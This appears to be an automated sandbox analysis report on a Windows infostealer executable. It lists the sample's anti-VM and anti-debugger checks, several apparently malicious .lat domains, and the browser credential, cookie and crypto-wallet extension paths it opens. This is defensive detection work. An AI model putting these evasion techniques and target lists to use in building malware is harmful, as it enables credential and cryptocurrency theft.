Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50A08F8 second address: 50A08FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50A08FD second address: 50A0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50A0AE9 second address: 50A0B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7D2AFB0Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50A0B0E second address: 50A0B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Special instruction interceptor: First address: 53782E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Special instruction interceptor: First address: 6CEA35 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Special instruction interceptor: First address: 760EE8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Code function: 0_3_0125C753 sldt word ptr [eax] 0_3_0125C753
Source: C:\Users\user\Desktop\zhQFKte2vX.exe TID: 5884 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\Desktop\zhQFKte2vX.exe TID: 2184 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\zhQFKte2vX.exe TID: 6820 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\zhQFKte2vX.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: zhQFKte2vX.exe, 00000000.00000002.1750925623.00000000006B0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPK
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: zhQFKte2vX.exe, zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750410108.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549571155.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: zhQFKte2vX.exe, 00000000.00000003.1577914312.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750410108.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549571155.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: zhQFKte2vX.exe, 00000000.00000002.1750925623.00000000006B0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\zhQFKte2vX.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\zhQFKte2vX.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: NTICE
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: SICE
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: SIWVID
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sweepyribs.lat
Source: zhQFKte2vX.exe, 00000000.00000002.1750925623.00000000006B0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\zhQFKte2vX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: zhQFKte2vX.exe, zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672486237.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1753601900.0000000005B10000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750410108.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672300135.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011E2000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\zhQFKte2vX.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: zhQFKte2vX.exe PID: 4208, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: zhQFKte2vX.exe String found in binary or memory: %appdata%\Electrum\wallets
Source: zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: zhQFKte2vX.exe String found in binary or memory: Wallets/JAXX New Version
Source: zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: zhQFKte2vX.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: zhQFKte2vX.exe, 00000000.00000003.1637773020.0000000001238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: zhQFKte2vX.exe, 00000000.00000003.1637773020.0000000001238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\zhQFKte2vX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
